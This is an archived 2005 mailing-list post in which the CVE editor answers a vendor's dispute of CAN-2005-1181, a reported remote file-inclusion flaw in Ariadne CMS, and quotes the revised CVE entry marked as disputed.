[VIM] Re: CVE id: CAN-2005-1181
Steven M. Christey
coley at linus.mitre.org
Tue Jul 5 14:00:14 EDT 2005
I suppose the 10 million comment will bite me someday, but it seems to be
a reasonable estimate.
On Tue, 5 Jul 2005, Steven M. Christey wrote:
> On Mon, 4 Jul 2005, Gijsbert te Riet wrote:
> > Dear reader,
> > The vulnerability report on your site, titled 'Ariadne Include File Flaw
> > Lets Remote Users Execute Arbitrary Commands', is inaccurate.
> We have modified the
> > We regret it that we were not informed about this 'flaw' before you
> > published it on your site, and had to find it by accident.
> Approximately 100 vulnerabilities per week are publicly reported, and it
> is estimated that full verification of each and every vulnerability report
> would likely cost in excess of 10 million dollars per year. Therefore it
> is not possible for us to verify every report.
> To see how difficult it is to find vendor acknowledgement for large
> numbers of vulnerabilities, please read the following report:
> "An informal analysis of vendor acknowledgement of vulnerabilities"
> Steve Christey, Barbara Pease
> However, we are always willing to post vendor disputes for inaccurate
> vulnerability information.
> I will forward your email to other vulnerability information sources so
> that they can make corrections. You might wish to send a post to the
> Bugtraq mailing list, which will reach a wide audience.
> I have modified the CVE candidate accordingly; see below. This will be on
> the CVE web site later today.
> > We hope you will update your entry with this information, and inform us the
> > next time an issue about one of our project arises.
> We are working on an automated capability to help us do this. I will add
> your email address and the keyword "ariadne" to this capability.
> I apologize for the inconvenience and hope that our quick response is
> Steve Christey
> CVE Editor
> Candidate: CAN-2005-1181
> URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1181
> Reference: OSVDB:15549
> Reference: URL:http://www.osvdb.org/15549
> Reference: SECTRACK:1013721
> Reference: URL:http://securitytracker.com/id?1013721
> Reference: XF:ariadne-loaderphp-file-include(20611)
> Reference: URL:http://xforce.iss.net/xforce/xfdb/20611
> ** DISPUTED **
> NOTE: this issue has been disputed by the vendor. PHP remote code
> injection vulnerability in loader.php for Ariadne CMS 2.4 allows
> remote attackers to execute arbitrary PHP code by modifying the
> ariadne parameter to reference a URL on a remote web server that
> contains the code. NOTE: the vendor has disputed this issue, saying
> that loader.php first requires the "ariadne.inc" file, which defines
> the $ariadne variable, and thus it cannot be modified by an attacker.
More information about the VIM